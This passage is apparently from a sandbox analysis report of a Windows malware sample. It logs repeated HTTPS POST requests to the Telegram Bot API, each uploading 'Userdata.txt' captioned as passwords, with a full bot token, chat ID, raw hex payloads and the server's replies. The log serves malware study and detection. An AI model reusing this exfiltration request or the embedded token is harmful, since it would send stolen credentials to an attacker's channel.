                                                                                                          2025-01-10 22:12:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 38 65 62 36 31 64 37 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3288eb61d7c5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:20 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:20 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:20 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44797,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547140,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.950004149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:21 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd329a73bbadd4
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 61 37 33 62 62 61 64 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd329a73bbadd4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:21 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:21 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:21 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44798,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547141,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.950006149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:23 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32aea0643760
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 65 61 30 36 34 33 37 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32aea0643760Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:23 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:23 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:23 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44799,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547143,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.950008149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:25 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32cc1b350f07
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 63 31 62 33 35 30 66 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32cc1b350f07Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:26 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:26 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:26 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44800,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547146,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.950010149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:27 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32e17780006a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 31 37 37 38 30 30 30 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32e17780006aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:27 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:27 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:27 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44801,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547147,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.950012149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:29 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32f2c5d2fb99
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 32 63 35 64 32 66 62 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32f2c5d2fb99Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:29 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:29 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:29 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44802,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547149,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.950014149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:30 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33055b4f13ff
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 35 35 62 34 66 31 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33055b4f13ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:30 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:30 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:30 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44803,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547150,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.950016149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:32 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3317e34e673a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
